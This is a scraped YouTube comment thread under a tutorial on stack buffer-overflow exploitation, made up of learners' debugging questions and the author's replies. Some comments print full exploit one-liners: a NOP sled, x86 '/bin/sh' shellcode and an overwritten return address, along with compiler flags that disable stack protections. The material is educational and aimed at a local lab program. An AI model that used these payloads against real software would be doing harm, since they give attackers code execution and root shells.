My course "Ethical Hacking: Pentesting and Securing Web Applications" is 90% off for the next 5 days! www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?couponCode=NEWYEAR2022 Sign up today for $10!
to anyone getting : Cannot insert breakpoint 1. Cannot access memory at address xxxxxx the displayed memory addresses when you run disassemble main at first are not correct . to get the correct ones run the commands as follow: gdb ./example run aaaaawhatever disassemble main now you get the correct ones copy it and quit gdb gdb ./example break *the address you copied now running the command (run $(python ........) will work. Thanks for the video :)
I agree, the author even managed to explain the "little endian" bit even though he said he wouldn't explain that :-)
8 ปีที่แล้ว +125
TL;DR. Most of you will get something like "Cannot access memory at address 0x...." That's because you have a 64 bit system installed. To get this work, use the $rsp register instead of $esp.
Dude! Thank you!!! I'm studying for the Security + and I didn't understand the concept of Buffer Overflow because I couldn't picture it but thanks to your video I gained better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming. Thanks lots mate!!!
Thanks man, i got a reliable shellcode from your description. I was bugging my head for not spawning a new shell with my shellcode. It worked like a charm with your shellcode.
You should use GDB to inspect the code and have an idea about the possible attack but since it inserts extra variables for debugging purpose, you'll have to del with the offset introduced.
Ran the code with the flags you mentioned in description but still facing the same issue of cannot access memory at address. I am using Kali linux 32 bit version in VM Ware. Disabled ASLR. Any solution would be highly appreciated.
You didn't mention one needs to make the stack executable for this, with the -zexecstack option to gcc while compiling. I found that the hard way but thanks for the video, it is very informative.
Hi Daniel, Thank you for posting this video, this is very helpful. I do have a couple questions for you though. 1) Have you posted the programs so that people can recreate this exercise on their own? If not, which programs are needed? 2) Do you have another video/tutorial on how to secure against a buffer overflow exploit? Thanks in advance!
This was great! I do have to say that the clicking was a little distracting. I guess it was a labtop? Maybe a mic off of amazon would increase the quality of your videos
Hello, Daniel, Thanks for the great tutorial! I am new to this topic, so the question might be basic. I have a question regarding the shell code we want to execute in the end. what is '/x90' * 222 ? and after we add the shell code we want to execute, why do we add '/xd0/xce/xff/xff'?
+xu zeyuan Firstly, thanks for the compliment and I'm glad that you enjoyed it! '/x90' represents the hexidecimal encoding of the 'no operation' operation which in security is commonly referred to as a NOP. 'x90' is a NOP in assembly and we want to place as many as we can as if we put our shell code (code that 'pops a shell') after our NOPs then if we load start executing anywhere in our series of NOPs (commonly referred to as a nopsled) then it will keep running NOPs (doing nothing) until it reaches our actual code. '/xd0/xce/xff/xff' refers to the memory location that we want to 'jump to' so that we can execute our code. We put it at the end as we are overwriting the stack pointer which dictates which piece of code will be run next. If you want to know more I recommend my buffer overflow theory video
Shellcode isn't something that you actually have to write for yourself, it is fine to just get it from online resources. Unfortunately I don't have any videos on shellcode or any good resources I can point you to but a brief description is just that it's machine code translated into hexidecimal, commonly with the goal of 'popping a shell' or in other words gaining the privilege level of the running program
I'm in the midst of understanding buffer overflow, thank you good sir for sharing this awesome tutorial. I do have a few questions though: 1) Is this tutorial assuming that ASLR is enabled? 2) Also, I see a "push %ebp" instruction, followed by a "sub $0x110, %esp" instruction in your disassembled main function. Correct me if I'm wrong (my understanding of assembly code is very limited), but does that mean that the EBP gets pushed onto the stack, before the ESP shifts by 0x110 bytes (272 bytes) below the EBP register? 3) If so, can't I just find the memory address of the buffer (p &buffer command), add 0x110 bytes + 0x4 bytes(size of EBP register) to that memory address to find the exact location of the return address, and then overwrite that return address to point to an address that's above it, ie address of buffer + 0x110 bytes + 0x4 bytes(size of EBP register) + 0x4 bytes(size of return address)? Once again, thank you for sharing this video! (:
Whenever I set breakpoints in gdb and run, the gdb process just quits? It says "[1]+ Stopped gdb ./[filename]" with no other errors. I've tried disabling ASLR in a number of ways so I'm not sure why this is happening
Hello, i have a question. In this tutorial we can observe the address of the buffer start on the stack, to which we gonna ret from the strcpy, after we overflow the stack inside that function, it is 0xffffced0 right? But isnt this address gonna be different each time? I mean os is placing stack start address different each time ( or not ? ) So if the system would place the stack on some other address, that shellcode woudnt work. Am i right or not? Great tutorial by the way!
Awesome question! I'm glad you asked. So there is a lot going on here and because this is the classical hack OS's have evolved to make it harder. The thing that you're mentioning is called ASLR (to learn more about this check out my other security video called Common Computer Security Hurdles) which works to randomise where the memory is going to occur. This means we effectively need two vulnerabilities (one that allows us to view where the memory is) to allow us to use this technique. ASLR isn't the only thing working against us though, this can easily be turned off and then just from other programs executing the stack can change and the memory that is executed can change, the thing that makes this okay is that it typically doesn't move much if we do the tasks in close succession. This is also one of the key reasons why we need a NOPsled. So you are completely right that it is a problem but it can easily be circumvented
I followed along and everything is the same for me (the addresses etc.). My output at the end even looks the same, EXCEPT that I get a segfault instead of executing bin/sh (which shows in the nonsense output similar to how the video shows). Any tips as to why this might happen? I am on an Ubuntu VM. I compile with the command shown in the description and aslr is off. Any advice is appreciated!
Very well done, I could not get it to work (can't access the memory issue), but I took notes and learned a lot from this! Will keep on trying with other examples just to get a hands on feeling for it.
Bro, Great one ,Actually U have showed something practically done here. But I got some doubts. Firstly, I didn't properly understand Shell code concept. Where does it come from ? What does it ( /x30, /x40,x50...... etc ) mean ? Will it do the same functionality in every system( i mean any OS). I have seen the description in comments but didn't get though. And I have a few more I will ask them once I saw the video again carefully. thank u
Shellcode is machine code that is 'compiled' to hexidecimal commonly with the intention of 'popping a shell', or in other words gaining the privilege level of the program. Where does it come from? It is written by the hacker, usually with the intention of 'popping a shell' What does it ( /x30, /x40,x50...... etc ) mean? These are hexidecimal values that can be converted into processor instructions (if this doesn't make sense then do a bit of research on machine language) Will it do the same functionality in every system (I mean any OS)? Interesting question with an interesting answer! Machine code is instruction set dependant and therefore depends on the architecture of the CPU. The most common types you will run into are x86 (almost every desktop and laptop) and ARM (almost everything else). So in answer to your question it depends on the CPU not on the operating system, so if you write shellcode for a phone it most likely won't work on a computer and visa versa Hopefully that clears things up a bit
The way that most people do it is they have a list of around 10 shellcodes for various situations, most commonly: a really short one for really small buffers, a very reliable one when the buffer is large, and several which don't characters which are often escaped. If you still feel the need to make your own then you can write basic programs in a compiled language (I'd recommend one with few abstractions such as C), and use "objdump -d /path/to/compiled/program"
I did everything as in the description, I have Kali linux, I get segfault at 260 but after feeding the payload to it I cant get a bash just another segfault. Turned off aslr, canary, stack protection. By the way the +'BBBB' trick wont work for me either. If I do run $(python -c "print('A'*256 + 'BBBB')"), I still get 'A's: Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () If I do run $(python -c "print('A'*257 + 'BBBB')"), I get: Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () This is my payload: run $(python -c "print('\x90'*214 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x10\xf0\xff\xbf')") I even tried to increase the stack address to '\x50\xf0\xff\xbf' but still get segfault. ==================== OK, I recompiled the code on an Ubuntu and I got the same results as you! :) I wonder what protection Kali can have that Ubuntu hasn't?
Hi, I wanted to ask if the shellcode you used is universal for every system, because I followed the tutorial exactly and in the end, the random non-printable characters appeared but I still received a segmentation fault and no shell opened. But maybe this has a different cause, I really just started getting in touch with these kind of exploits.
Hi there, what if there are no call functions, but you still want to put a breakpoint under strcopy? Can you put a breakpoint on any of them or does it have to be specifically under a call function?
First x means examine second one means hexadecimal form and b means byte. So basically the command says examine and print 200 of hexadecimal format registers each of a size of a byte.
Hello Daniel :) Can i ask you one thing? Why is your stack or disas main, different than mine? Firstly, I've tried to compile with your line, both with my ubuntu linux, and my kali linux but both of them when compiling, they said it was missing different .h files at each of them, which i installed the corresponding libraries. Both of them worked fine, but both of them, have different stack or disas main, from yours ... whys that? i didnt try to go further from there, because i dont know assembly code and dont know further. Please can you help me? Or know whys that, or is it natural?
Hello, nice video. But I keep getting the error "/bin/bash: ..... : Argument list too long" "bin/bash:... : Success ". What can I do to avoid this error?
So I almost made it. now it does attempt to spawn a shell, but I always end up getting a segmentation fault. I did compile it without stack protection to get it to work. For whatever reason, I can't get linux shellcode to work or launch
Can you actually execute code in stack-segment? Isn't there supposed to be a protection that separates code from data and won't allow to treat the latter as the former?
in 3:34 i have 4 bytes different and then it starts like \x41 \x41 ... example:\x03 \xd1 \x00 \x21 \x41 \x41 ... does this affect somehow the address 0xffffxde0?should i subtract something?
hey daniel slater!! i got the return adress 0x41414141 at $(python -c"print('A'*260)") itself but when i use $(python -c"print('A'*256+'BBBB')") i get the return adress as 0x41414141. if i try with 262 or something then i am getiing a constant adress as 0x0804848a. Where am i going wrong? why am i not getting 0x42424242 as return adress?
Two things 1. Are you using the correct flags? 2. If 'A'*260 returns 0x41414141 it either means there has been an extreme coincidence (that will never occur unless the program is actually designed for that to occur but that's a discussion for another day) or 4 of your A's are already overwriting the buffer. Because of this if you try with 262it shouldn't work because we know that the return address is somewhere between 0 and 260. If on 256 it still prints 0x41414141 then try 252 and move down in increments of 4 until it returns 42's.
hey Daniel slater, i used all the flags and also disabled ASLR. i have found that my return adress is 4 bytes and located at (112th , 111th , 110th, 109th )positions. i have conluded this by using the command run $(python -c"print('C'*111+'A'*20+'B'*129). when i run this i get the error saying 0x41434343. Now how should i proceed further with this information?
i then used this command run $(python -c "print('\x90'*108+'\x00\xcf\xff\xff'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x90'*102)") and then it says process exited normally, but there is no root shell grant. where am i going wrong?
Look at my off by one video and hopefully you'll learn what happened then. The buffer is definitely not at 109 given that the buffer is 256 bytes long. Unless there is a bug in the c compiler (that is triggered by basic problems) you're overwriting part of the return address but not the full thing
Daniel Slater i got sucessfull in accessing the bin/sh... the above print command with the shell code works!!! Thank you so much dude!!! This is the best tutorial ever
You need to compile this with debugging options correct? on any system you're trying to hack they obviously arent going to give that to you so do people just use trial and error in order to find their memory locations?
Great video, except one question. Why was your entire overflow 272 bytes. We know the allocated buffer is 256 + 4 for ebp + 4 for ret, so where did the extra 8 bytes come from?
There are a couple of potential things it could have come from, most likely of which is that padding is added for optimisation purposes. As my computer is 64bit (yes I know the program was compiled as 32bit and all operations are executed as though it is 32bit) the stack frame will behave the same as though it is 64bit (note that there are certain instances where this isn't the case.) The stack frame is going to add four bytes of padding as the CPU instruction set is set up for accessing things from the start of the stack frame and manipulations to work on 'misaligned memory' involves more clock cycles. What this basically means is 4 byte variables will 'take up' the width of the stack frame (but only the amount allocated is accessible.) Note that it is possible to override this optimisation with compiler flags which might be useful if memory on the device was restricted.
Oh sorry just realised I didn't explicit answer the question after that explanation! Because of that it is likely that ebp and ret each take up 8 bytes, totalling 16 so it adds up. If you want to learn more about memory management and padding I'd recommend playing around in GDB. You can quite easily write some programs that do basic things and then just use GDB and the examine function (demonstrated in this video) to see exactly what is happening. A word of caution though is to look at what optimisation flags if any are set and see what difference that makes
Hi Daniel, thanks for the nice video. When I run from gdb getting below message: process 5989 is executing new program: /bin/dash Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x8048471 When running the executable getting below error: �����/bin/sh���� Segmentation fault (core dumped) Any idea why?
Hi Daniel first off great tutorial :) I seem to be getting an error like most people on here liek another user prud says "! i got the return adress 0x41414141 at $(python -c"print('A'*260)") itself but when i use $(python -c"print('A'*256+'BBBB')") i get the return adress as 0x41414141." this exact thing is happening to me,I went down in multiples of 4 but when I did I got no seg fault the seg fault only occurs when the total value is 260 any idea why? thanks (note my ASLR and stack protector is turned off)
when i try to find the size of buffer, i get Program received signal SIGSEGV, Segmentation fault. _IO_fgets (buf=0xbfffe847 "", n=9, fp=0x0) at iofgets.c:50 50 iofgets.c: No such file or directory. what am i doing wrong?
I use \x90 with assumption that it will store as a single byte in memory, but it doesn't. It gets store as it is with hex values 3039785c. Even file storing these input or shell code also take more memory than exact no of bytes in them. I am on 64 byte machine and compiling program using m32.
I've addressed this in other comments but you have to think about how memory is stored in C. The short explanation is that padding is added to memory to make it more efficient to access
I can not get the shell to pop at the end. I wonder is it this: (gdb) run $(python -c "print('A'*260)") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260)") AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) run $(python -c "print('A'*260+'BBBB')") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260+'BBBB')") AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB Program received signal SIGSEGV, Segmentation fault. 0x0804848a in main () I do not get 0x42424242 in ?? () I think this is my problem.
Everything seems to work, except at the end, the "/bin/sh" program isn't run. I get the following instead: Program received signal SIGILL, Illegal instruction. 0xb7e30a00 in __libc_start_main (main=0x804844d , argc=3, argv=0xbffff0a4, init=0x8048490 , fini=0x8048500 , rtld_fini=0xb7fed180 , stack_end=0xbffff09c) at libc-start.c:246 246 libc-start.c: No such file or directory. I also get this message when looking for the edge of the buffer: run $(python -c "print('A'*268 )") I know this is an old post, but if anyone has any ideas, I would greatly appreciate it.
What if the stored input is much smaller like $(python -c "print('A'*28+'BBBB')")? The shell code is 46 bytes. He subtracts it from the 268 (in my case 28). That doesn't fit right?
Yeah that doesn't fit. In reality you need a pretty large buffer because without a NOPSLED you'll need either a lot of luck or a lot of attempts to actually get the right starting address
Daniel Slater Or maybe need smaller shellcode? I'd don't need to get a shell though, just need contents of a file which I can't access (for a challenge just to be clear). This should possible with smaller shellcode I guess. But I'll need to write that myself somehow. Do you have any tuts on how to do that? Thx for the video!
I don't have it readily available but if you want I'm sure you could convert it pretty quickly. Shellcode is the sort of thing that is good to write a few times to get an idea of what it actually is and what's happening but most people just get stuff online because there really isn't any benefit to writing it yourself. If you want to look at example shellcode and the conversion then check out this link shell-storm.org/shellcode/files/shellcode-827.php
TLDR: 32bit x86 Excellent question. When I made the video x86 was the dominant architecture and it didn't seem like ARM was going to be anywhere near it is today so I didn't even think of other architectures. It's x86 on a 32bit virtual machine running on a 64bit mac.
@@danielslater Wow thank you for your prompt reply! I was testing it myself last night on a kali-linux 2020.4 64bit. I am using windows 10 64 bit on intel i9-9900k Was also running in virtual machine so I was wondering when I am looking for shellcode exploits what should I look for? Do I need to install a 32bit Linux? If I do so, do I need a shell code which targets the OS of the virtual machine?
Thank you so mush for the tutorial i guess this tutorial won't work with new ubuntu releases if the are 64 bits do you recommend me to use ubuntu 14 ? i was thinking in downloading ubuntu 14.02 32 bits to be on the safe side please advise thanks in advance
This underlying mechanic of why this works will still be present in all Ubuntu releases for the foreseeable future. This can work with 64bit but you must use the compiler flag -m32 to force it to compile to a 32bit program. If I was in your position I'd go for the 32bit version as you won't run into problems with that
thank you so mush i ran the experiment on ubuntu 32 bits it worked perfectly , the problem was that cdefs.h was missing in my 64 bit installation although i downloaded the latest release from ubuntu 64-bits and i read in previous comments that others faced the same issue . i wanted to ask you i executed the code on shell ,i copied it from gdb so that the memory doesn't move around and executed the program executed and opened a shell i then gave chmod 777 to my c program the program executed but the shell i obtained was still under user not root i wanted to impress my professor by gaining root access is it feasible using this attack ?
This hack can give you root but the key thing to remember is that you receive the same privilege level that the program is running at. By default you're probably running it as user but you can run it with sudo in front which will make it run as root and therefore after the buffer overflow you will have a shell with root
No matter how I change the value of 'A' * num to 250, 260 or 1000, I cannot obtain something like 0x41414141. It just shows some normal address like: 0xb7f26411 in __kernal_vsyscall(). How should I proceed? :(
Hey Dan , Nice example. But for me its not working. I get : Program received signal SIGSEGV, Segmentation fault. 0xf7e68929 in ptmalloc_init.part () from /usr/lib32/libc.so.6 Any ideas ?
So maybe what I've got there is a bit deceptive because it's an exceptionally simple example. The reason strcpy comes up is because it's an inbuilt call, if you create your own function and call it then you can't get the name from the executable because it's simply not stored (it's possible there are compiler flags you can get to get it to store them but not that I know of) If you're interested in learning more about reverse engineering I'd recommend doing an online course in it or writing your own simple programs and dissembling them to start seeing basic patterns, if you take the second approach I'd recommend looking a bit more into compiler flags because there can be tricks like inlining which could throw you off
I tried your method, copied every step but couldn't able to do it... Why so can anyone answer? Does gdb or gcc making doing something? Or is there any other reason
When asking for debugging help it's useful if you include information about what commands you're running and if anything about your setup is non-standard. Currently it's impossible to give you useful advice
Then you can't use that shell code so you'll either need to shorter shellcode, use some of the already written code as part of your shellcode or use another approach such as ret2libc
Unfortunately this is out of the scope of this youtube channel as the answer gets extremely long extremely fast. A lot of security is knowing a lot of techniques for doing something and hoping one works, so I would suggest doing a full pen testing course
Hello, I have an exam this Monday and I am completely lost, please! Can you answer my questions: Question 0 What is the fault? What is the purpose of this service? Which versions are vulnerable? What version did you use? Question 1 What protections against this attack Question 2 !!! Structure of the stack just before the overflow Question 3 !! Structure of the string sent to overflow Question 4 !!! Structure of the stack just after the overflow Question 5 !! Where does the new return address point? How is it determined? Question 6! What code is at this address Question 7! What happens to the Shell code? Question 8 What does the Shell code do? Question 9 What does your attack do? Which file is introduced on the victim? How? What action does this file take? how?
Learning this type of security if you have no programming background is impossible. I'd strongly recommend learning some basic C before trying to broach low level security
You have to quit after you copy. After you run blahblahblah. Then you disas main. You get your number, copy then quit. Open again then break *yournumber.
I had a rough look thanks for the whole thing, I have a question where did you open the socket to access the ip address? how do you connect(remote) to that ip address and port of that software?
Hey sorry to ask so many ques.... I get the following after running.... /bin/dash: 0: Can't open ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[1��C��C � ��S �����/bin/sh���� [Inferior 1 (process 9130) exited with code 0177] ANy idea what could be the prob ?
![HIWWHEE | OHM [Official MV]](http://i.ytimg.com/vi/OJJLtTLqLag/mqdefault.jpg)
My course "Ethical Hacking: Pentesting and Securing Web Applications" is 90% off for the next 5 days! www.udemy.com/course/web-security-fundamentals-how-to-hack-and-secure-web-apps/?couponCode=NEWYEAR2022
Sign up today for $10!
Or just do portswigger labs
to anyone getting :
Cannot insert breakpoint 1.
Cannot access memory at address xxxxxx
the displayed memory addresses when you run disassemble main at first are not correct .
to get the correct ones run the commands as follow:
gdb ./example
run aaaaawhatever
disassemble main
now you get the correct ones copy it and quit gdb
gdb ./example
break *the address you copied
now running the command (run $(python ........) will work.
Thanks for the video :)
Thank you!
i love you
it worked.. Thank you :)
why though? why execute run? how does it reform the address values?
may god increase your life by (the same address which i copied) years
I must say, this is the best video tutorial I have come across explaining how to exploit a buffer overflow. Well done!
I concur!
I agree, the author even managed to explain the "little endian" bit even though he said he wouldn't explain that :-)
TL;DR. Most of you will get something like "Cannot access memory at address 0x...."
That's because you have a 64 bit system installed.
To get this work, use the $rsp register instead of $esp.
Another way around this is to use the compiler flags I've included in the description. One of them is -m32 which compiles it as a 32bit program
Nem gondoltam volna, hogy erre magyarral találkozok, hát de no.
thx
why not compile with the -m32 flag? convert it to 32 bits
at the end of the example i get Program received signal SIGSEGV, Segmentation Fault...how come?
Dude! Thank you!!!
I'm studying for the Security + and I didn't understand the concept of Buffer Overflow because I couldn't picture it but thanks to your video I gained better understanding. The visual aspect is of great help to someone like me who knows nothing about software coding and programming.
Thanks lots mate!!!
Thanks man, i got a reliable shellcode from your description. I was bugging my head for not spawning a new shell with my shellcode. It worked like a charm with your shellcode.
thank you so much man. this video saved me on a homework assignment!
Great job at really explain buffer overflows and how to exploit it.
This tutorial is amazing. Thank you so much for the work you put into it
This really helped me understand the details of buffer overflows, thanks!
this might be the best tutorial ever, but I still couldn't understand my security homework
I hope you have been able to figure it out cos am still struggling with mine 😊
Ah, finally, a comment i relate to.
@@rixlayer lol, looks like you were giving an assignment on buffer overflow also
Great explanation, and concise example. Thanks.
You should use GDB to inspect the code and have an idea about the possible attack but since it inserts extra variables for debugging purpose, you'll have to del with the offset introduced.
Thank you so much for this! Practical and easy to understand.
Great explanation. Thank you for the details!
Love this would have loved a little more explanation on the shell code tho would have gladly watched for 30 mins
Ran the code with the flags you mentioned in description but still facing the same issue of cannot access memory at address. I am using Kali linux 32 bit version in VM Ware. Disabled ASLR. Any solution would be highly appreciated.
You didn't mention one needs to make the stack executable for this, with the -zexecstack option to gcc while compiling. I found that the hard way but thanks for the video, it is very informative.
impressive skills
thanks for the tutorial !!
Hi Daniel,
Thank you for posting this video, this is very helpful. I do have a couple questions for you though.
1) Have you posted the programs so that people can recreate this exercise on their own? If not, which programs are needed?
2) Do you have another video/tutorial on how to secure against a buffer overflow exploit?
Thanks in advance!
Thank you, you are a great human
This was great! I do have to say that the clicking was a little distracting. I guess it was a labtop? Maybe a mic off of amazon would increase the quality of your videos
Hello, Daniel,
Thanks for the great tutorial!
I am new to this topic, so the question might be basic.
I have a question regarding the shell code we want to execute in the end.
what is '/x90' * 222 ?
and after we add the shell code we want to execute, why do we add '/xd0/xce/xff/xff'?
+xu zeyuan Firstly, thanks for the compliment and I'm glad that you enjoyed it! '/x90' represents the hexidecimal encoding of the 'no operation' operation which in security is commonly referred to as a NOP. 'x90' is a NOP in assembly and we want to place as many as we can as if we put our shell code (code that 'pops a shell') after our NOPs then if we load start executing anywhere in our series of NOPs (commonly referred to as a nopsled) then it will keep running NOPs (doing nothing) until it reaches our actual code.
'/xd0/xce/xff/xff' refers to the memory location that we want to 'jump to' so that we can execute our code. We put it at the end as we are overwriting the stack pointer which dictates which piece of code will be run next.
If you want to know more I recommend my buffer overflow theory video
I didn't understand that shellcode, how to write it ?
Shellcode isn't something that you actually have to write for yourself, it is fine to just get it from online resources. Unfortunately I don't have any videos on shellcode or any good resources I can point you to but a brief description is just that it's machine code translated into hexidecimal, commonly with the goal of 'popping a shell' or in other words gaining the privilege level of the running program
I'm in the midst of understanding buffer overflow, thank you good sir for sharing this awesome tutorial. I do have a few questions though:
1) Is this tutorial assuming that ASLR is enabled?
2) Also, I see a "push %ebp" instruction, followed by a "sub $0x110, %esp" instruction in your disassembled main function. Correct me if I'm wrong (my understanding of assembly code is very limited), but does that mean that the EBP gets pushed onto the stack, before the ESP shifts by 0x110 bytes (272 bytes) below the EBP register?
3) If so, can't I just find the memory address of the buffer (p &buffer command), add 0x110 bytes + 0x4 bytes(size of EBP register) to that memory address to find the exact location of the return address, and then overwrite that return address to point to an address that's above it, ie address of buffer + 0x110 bytes + 0x4 bytes(size of EBP register) + 0x4 bytes(size of return address)?
Once again, thank you for sharing this video! (:
Whenever I set breakpoints in gdb and run, the gdb process just quits? It says "[1]+ Stopped gdb ./[filename]" with no other errors. I've tried disabling ASLR in a number of ways so I'm not sure why this is happening
mine quits like yours
Same
Hello, i have a question. In this tutorial we can observe the address of the buffer start on the stack, to which we gonna ret from the strcpy, after we overflow the stack inside that function, it is 0xffffced0 right? But isnt this address gonna be different each time? I mean os is placing stack start address different each time ( or not ? ) So if the system would place the stack on some other address, that shellcode woudnt work. Am i right or not? Great tutorial by the way!
Awesome question! I'm glad you asked. So there is a lot going on here and because this is the classical hack OS's have evolved to make it harder. The thing that you're mentioning is called ASLR (to learn more about this check out my other security video called Common Computer Security Hurdles) which works to randomise where the memory is going to occur. This means we effectively need two vulnerabilities (one that allows us to view where the memory is) to allow us to use this technique.
ASLR isn't the only thing working against us though, this can easily be turned off and then just from other programs executing the stack can change and the memory that is executed can change, the thing that makes this okay is that it typically doesn't move much if we do the tasks in close succession. This is also one of the key reasons why we need a NOPsled. So you are completely right that it is a problem but it can easily be circumvented
+Daniel Slater thanks for the answer, looking forward to your videos
I followed along and everything is the same for me (the addresses etc.). My output at the end even looks the same, EXCEPT that I get a segfault instead of executing bin/sh (which shows in the nonsense output similar to how the video shows). Any tips as to why this might happen? I am on an Ubuntu VM. I compile with the command shown in the description and aslr is off. Any advice is appreciated!
I have the same problem (just commenting to get notified about eventual answers).
Bump for same issue. prints out ""....gibberish.../bin/sh...gibberish.." then segfaults.
Very well done, I could not get it to work (can't access the memory issue), but I took notes and learned a lot from this! Will keep on trying with other examples just to get a hands on feeling for it.
Same problem...
Bro, Great one ,Actually U have showed something practically done here.
But I got some doubts.
Firstly, I didn't properly understand Shell code concept. Where does it come from ? What does it ( /x30, /x40,x50...... etc ) mean ?
Will it do the same functionality in every system( i mean any OS). I have seen the description in comments but didn't get though.
And I have a few more I will ask them once I saw the video again carefully.
thank u
Shellcode is machine code that is 'compiled' to hexidecimal commonly with the intention of 'popping a shell', or in other words gaining the privilege level of the program.
Where does it come from? It is written by the hacker, usually with the intention of 'popping a shell'
What does it ( /x30, /x40,x50...... etc ) mean? These are hexidecimal values that can be converted into processor instructions (if this doesn't make sense then do a bit of research on machine language)
Will it do the same functionality in every system (I mean any OS)? Interesting question with an interesting answer! Machine code is instruction set dependant and therefore depends on the architecture of the CPU. The most common types you will run into are x86 (almost every desktop and laptop) and ARM (almost everything else). So in answer to your question it depends on the CPU not on the operating system, so if you write shellcode for a phone it most likely won't work on a computer and visa versa
Hopefully that clears things up a bit
This is a really good video. Thanks for the work. One question what is the return address. Is that the same thing as the memory address?
Good video mate.
Thank you for the video!
Very helpful!! Thanks!!
This really helps
Don't forget to use python 2 not 3. Otherwise the NOP sled will not be created correctly!
really helpfull!!
Thank you so much.
great vid u explain very good
Excellent explanation thank you. Can you advise on how you developed the machine code that you ran to get shell to start.
The way that most people do it is they have a list of around 10 shellcodes for various situations, most commonly: a really short one for really small buffers, a very reliable one when the buffer is large, and several which don't characters which are often escaped.
If you still feel the need to make your own then you can write basic programs in a compiled language (I'd recommend one with few abstractions such as C), and use "objdump -d /path/to/compiled/program"
how did you create the pre-prepared shell code?
msfvenom:)
thank you so much 🤩
I did everything as in the description, I have Kali linux, I get segfault at 260 but after feeding the payload to it I cant get a bash just another segfault.
Turned off aslr, canary, stack protection.
By the way the +'BBBB' trick wont work for me either.
If I do run $(python -c "print('A'*256 + 'BBBB')"), I still get 'A's:
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
If I do run $(python -c "print('A'*257 + 'BBBB')"), I get:
Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
This is my payload:
run $(python -c "print('\x90'*214 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x10\xf0\xff\xbf')")
I even tried to increase the stack address to '\x50\xf0\xff\xbf' but still get segfault.
====================
OK, I recompiled the code on an Ubuntu and I got the same results as you! :)
I wonder what protection Kali can have that Ubuntu hasn't?
what version of Ubuntu did you use? I'm using Ubuntu 16.04 LTS and it won't work for me I am getting the exact same result as you did with Kali
Hi, I wanted to ask if the shellcode you used is universal for every system, because I followed the tutorial exactly and in the end, the random non-printable characters appeared but I still received a segmentation fault and no shell opened.
But maybe this has a different cause, I really just started getting in touch with these kind of exploits.
Hi there, what if there are no call functions, but you still want to put a breakpoint under strcopy? Can you put a breakpoint on any of them or does it have to be specifically under a call function?
I didnt understand why you typed in x/200xb , why 200 ? Could someone explain?
First x means examine second one means hexadecimal form and b means byte.
So basically the command says examine and print 200 of hexadecimal format registers each of a size of a byte.
What does "call" exactly mean? Calling a function we know?? But I still didn't understand what you mean.
Hello Daniel :) Can i ask you one thing? Why is your stack or disas main, different than mine?
Firstly, I've tried to compile with your line, both with my ubuntu linux, and my kali linux but both of them when compiling, they said it was missing different .h files at each of them, which i installed the corresponding libraries. Both of them worked fine, but both of them, have different stack or disas main, from yours ... whys that? i didnt try to go further from there, because i dont know assembly code and dont know further.
Please can you help me? Or know whys that, or is it natural?
same here did you fix the problem?
Thanks a Lot!! AweS0me Vide0
Hello, nice video. But I keep getting the error "/bin/bash: ..... : Argument list too long" "bin/bash:... : Success ". What can I do to avoid this error?
Using ubuntu 64bit...Not sure how this affects the process but I was not able to override the address of segmentation fault with the 'A' input...
Can you confirm that you compiled with the relevant flags and turned aslr off?
It seems to do with stack canaries state at the default compiling...
Here is the compile line from the video description
"gcc -o example -fno-stack-protector -m32 -z execstack example.c"
@@danielslater I get the same error. I have compiled using m32 and turned off aslr
@@sanhitaguha1135 Where you able to write the 'A' s? As I am having issues with that.
So I almost made it. now it does attempt to spawn a shell, but I always end up getting a segmentation fault. I did compile it without stack protection to get it to work. For whatever reason, I can't get linux shellcode to work or launch
Can you actually execute code in stack-segment? Isn't there supposed to be a protection that separates code from data and won't allow to treat the latter as the former?
hi sir, I am following all the steps, but my computer shows me the stack smashing, can I know why my terminal shows different things to me?
in 3:34 i have 4 bytes different and then it starts like \x41 \x41 ...
